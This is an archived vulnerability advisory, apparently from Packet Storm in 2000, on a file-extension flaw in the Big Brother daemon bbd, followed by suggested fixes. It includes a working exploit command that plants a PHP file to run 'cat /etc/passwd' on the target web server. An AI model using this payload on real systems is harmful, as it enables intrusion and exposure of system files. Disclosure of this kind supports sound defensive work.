bb-14h2.txt

2000-07-13T00:00:00
ID PACKETSTORM:22535
Type packetstorm
Reporter Xternal
Modified 2000-07-13T00:00:00

Description

                                        
                                            `versions affected: bb14h2 (current) and older  
  
  
exploit:  
bbd listens for incoming connections on port 1984.  
Using telnet or the bb client, it is possible to  
connect and create a filename with an arbitrary  
extension, as the extension is not rigorously checked.  
As this file is droped into a directory accessible  
via the web server, any file extension that is parsed  
server side can be abused. For example:  
  
./bb 1.2.3.4 "status evil.php3 <?<system(\"cat  
/etc/passwd\");?>"  
  
will allow viewing of the /etc/passwd upon browsing to  
http://1.2.3.4/bb/logs/evil.php3.  
  
  
solutions:  
-Modify bbd.c to only allowed specified file  
extensions(.disk, .proc ...)  
  
-Implement access restrictions via  
$BBHOME/etc/security to minimize exposure to  
vulnerabilities. Unfortunately, the default install  
doesn't enable the security file.  
  
  
__________________________________________________  
Do You Yahoo!?  
Get Yahoo! Mail – Free email you can access from anywhere!  
http://mail.yahoo.com/  
  
`